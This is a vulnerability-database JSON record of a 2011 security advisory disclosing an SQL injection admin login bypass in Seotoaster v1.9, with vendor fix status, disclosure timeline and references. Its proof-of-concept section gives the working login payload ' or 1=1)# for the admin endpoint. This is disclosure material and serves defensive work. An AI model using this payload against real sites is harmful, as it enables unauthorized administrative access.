{"id": "SECURITYVULNS:DOC:27451", "bulletinFamily": "software", "title": "Seotoaster SQL-Injection Admin Login Bypass", "description": "Advisory: \tSeotoaster SQL-Injection Admin Login Bypass\r\nAdvisory ID: \tINFOSERVE-ADV2011-06\r\nAuthor: \tStefan Schurtz\r\nContact: security@infoserve.de\r\nAffected Software: Successfully tested on Seotoaster v.1.9\r\nVendor URL: http://www.seotoaster.com/\r\nVendor Status: fixed\r\n\r\n==========================\r\nVulnerability Description\r\n==========================\r\n\r\nSeotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login\r\n\r\n==================\r\nPoC-Exploit\r\n==================\r\n\r\nhttp://<target>/seotoaster/go\r\n\r\nUser: ' or 1=1)#\r\nPW: notimportant\r\n\r\n=========\r\nSolution\r\n=========\r\n\r\nUpgrade to the latest version\r\n\r\n====================\r\nDisclosure Timeline\r\n====================\r\n\r\n15-Nov-2011 - Secunia SVCRP (vuln@secunia.com)\r\n15-Dec-2011 - fixed by vendor\r\n\r\n========\r\nCredits\r\n========\r\n\r\nVulnerabilitiy found and advisory written by the INFOSERVE security team.\r\n\r\n===========\r\nReferences\r\n===========\r\n\r\nhttp://secunia.com/advisories/46881/\r\nhttp://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt \r\n", "published": "2011-12-19T00:00:00", "modified": "2011-12-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27451", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 59, "enchantments": {"score": {"value": 1.3, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12098"]}]}, "exploitation": null, "vulnersScore": 1.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{}